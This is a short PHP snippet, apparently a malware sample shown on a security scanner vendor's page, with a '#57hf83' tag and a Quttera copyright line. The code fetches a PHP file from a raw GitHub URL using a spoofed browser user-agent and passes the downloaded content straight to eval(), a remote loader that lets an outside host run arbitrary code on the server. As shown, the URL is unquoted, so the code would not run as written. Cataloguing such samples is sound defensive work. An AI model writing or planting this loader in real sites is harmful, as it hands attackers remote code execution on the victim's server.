#57hf83
function fetchRemote($url) {
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36'
]);
yield curl_exec($ch);
curl_close($ch);
}
foreach(fetchRemote(https://raw.githubusercontent.com/NoobTecho/w/refs/heads/main/manz_bule2.php) as $content) {
eval(''.$content);
}
© 2023 Quttera Ltd. All rights reserved.